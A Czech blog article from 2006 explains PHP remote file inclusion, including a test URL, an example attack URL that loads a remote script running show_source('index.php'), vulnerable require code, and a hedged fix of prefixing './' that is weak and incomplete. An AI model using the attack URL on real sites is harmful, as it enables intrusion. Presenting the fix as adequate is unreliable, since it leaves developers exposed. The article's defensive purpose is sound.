PHP injekce Mozektevidi.net - Píše Olda Šálek.

Navigace:Mozektevidi.netIT bezpečnost ⇒ PHP injekce

PHP injekce

Popis php injekce, využití, zneužití, nebezpečné weby. PHP inekcí padlo hodně webů. Braňte se proti skript kiddies


image of PHP injekce
page injekce php, jak na php injekci, google chrom dowland, www injekce wz cz, php injekce kodu, obrana php injekce, injekce wz cz, php injelce, injekce php, php injekce,

úvod Php injekce

Toto je velmi základní chyba. Kdo má tuto chybu na svém webu, tak mu web "hackne" i 13ti letá holka. Takže proč nechávat útočníkům (lamkám co neumí nic lepšího než ničit) otevřené dveře? Oprava je velmi jednoduchá

Obsahuje můj web tu chybu?

Jestli-že struktura vašich stránek vypadá přibličně takto:
http://mozektevidi.ic.cz//clanek/php-injekce
je jistá pravděpodobnost, že web je napadnutelný. Pro zkoušku zkus:
http://mozektevidi.ic.cz//clanek/http://google.com.
Zobrazil se někde na stánce google? Tak pozor, chyba zde je!
Poznámka: Místo clanek může být cokoliv, např: show, wiew, go, jdi.., inspiraci se meze nekladou.

Jak takový web najít?

Když už někdo takový web hledá, hledá ho kvůli ničení. Proto zde nebude dávat text, co se má zadat do google.

Jaká je zneužitelnost?

Někdo si řekne:„Co tomu vadí, nějaký google na stránce, pche“. No ale co když adresa bude vypadat třeba takto:
http://mozektevidi.ic.cz//clanek/http://mujweb.wz.cz/script.txt?
To už nastává pro webmastera docela problém. Tímto odkazem provede web cizí script, který může vypadat třeba takto:

show_source("index.php");

To už je docela blbé. Chyba byla například na webu pragueexclusive.com nebo dasilvio.cz.

Obrana?

Obrana je jednoduchá. Prakticky jde o to, aby se před proměnou $data vložilo ./. V případě útoku typu
http://mozektevidi.ic.cz/index.php/clanek/http://seznam.cz
se nevloží seznam.cz ale ./http://seznam.cz

Špatně

$data= $_REQUEST["g"];
require $data;

Snad dobře

$data= $_REQUEST["g"];
$data = "./". $data;
autor Oldřich Šálek | cal 18.11.2006 | články o IT bezpečnosti a obraně proti hackingu IT bezpečnost |

Kometáře


Komentáře a diskuze ke článku tady
diskuze ke článku

Související články

najit majitele telefonniho cisla prednaska vit vrba webexpo postup instalace mafia 2 kunda na kole školné na vysokých školách beruska icq do mobilu operacni system transformers 2 foto gta 4 demo ke stazeni zdarma facebook hled